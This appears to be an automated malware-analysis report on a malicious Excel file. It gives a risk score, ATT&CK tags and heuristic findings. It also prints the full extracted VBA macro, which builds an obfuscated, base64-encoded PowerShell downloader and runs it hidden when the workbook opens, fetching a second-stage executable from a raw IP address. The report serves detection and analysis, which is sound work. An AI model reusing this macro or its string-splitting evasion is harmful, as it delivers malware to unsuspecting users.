MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1566.001 Spearphishing Attachment
The sample contains VBA macros that are obfuscated using string splitting. The macro constructs and executes a PowerShell command to download and execute a second-stage payload from the URL 'http://3.4.251.39/y3/2/REqests0752w00653.exe'. This indicates a downloader or droppper functionality, likely delivered via spearphishing.
Heuristics 3
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2406 bytes |
SHA-256: 8ae4c80f890a4524f91a599df1c5619d02cb914d28a041cb14e95d5bc62d02b4 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Activate()
On Error Resume Next
Dim bat As String
Dim s As String
s = s + "start "
Dim a As String
s = s + "/MI" + "N C:\Wi" + "ndo"
Dim dfdf As String
s = s + "ws\Sys" + "tem32\" + "Wind" + "owsPo" + "wer"
Dim fwefewf As String
s = s + "She" + "ll\v1.0" + "\pow" + "ersh" + "ell." + "exe"
Dim ewfwef As String
s = s + " -win " + "1 -e" + "nc "
s = s + "JABQAHIAbwBjAE4"
s = s + "AYQBtAGUAIAA9AC"
s = s + "AAIgBXAGgAZQBhA"
s = s + "GgAbQBuAGYAcABn"
s = s + "AGEAcQBzAGUALgB"
s = s + "lAHgAZQAiADsAKA"
s = s + "BOAGUAdwAtAE8AY"
s = s + "gBqAGUAYwB0ACAA"
s = s + "UwB5AHMAdABlAG0"
s = s + "ALgBOAGUAdAAuAF"
s = s + "cAZQBiAEMAbABpA"
s = s + "GUAbgB0ACkALgBE"
s = s + "AG8AdwBuAGwAbwB"
s = s + "hAGQARgBpAGwAZQ"
s = s + "AoACIAaAB0AHQAc"
s = s + "AA6AC8ALwAzAC4A"
s = s + "NgA0AC4AMgA1ADE"
s = s + "ALgAxADMAOQAvAH"
s = s + "YAMwAvADIALwBSA"
s = s + "GUAcQB1AGUAcwB0"
s = s + "AHMAMAA3ADUAMgA"
s = s + "wADAAMAAwADYANQ"
s = s + "AyAC4AZQB4AGUAI"
s = s + "gAsACIAJABlAG4A"
s = s + "dgA6AEEAUABQAEQ"
s = s + "AQQBUAEEAXAAkAF"
s = s + "AAcgBvAGMATgBhA"
s = s + "G0AZQAiACkAOwBT"
s = s + "AHQAYQByAHQALQB"
s = s + "QAHIAbwBjAGUAcw"
s = s + "BzACAAKAAiACQAZ"
s = s + "QBuAHYAOgBBAFAA"
s = s + "UABEAEEAVABBAFw"
s = s + "AJABQAHIAbwBjAE"
s = s + "4AYQBtAGUAIgApA"
s = s + "A=="
Dim x As Double
ActiveWorkbook.Save
bat = "Gqyztfbtsogpnruooqr.bat"
Open bat For Output As #1
Print #1, s
Close #1
x = Shell(bat, 0)
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Workbook"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.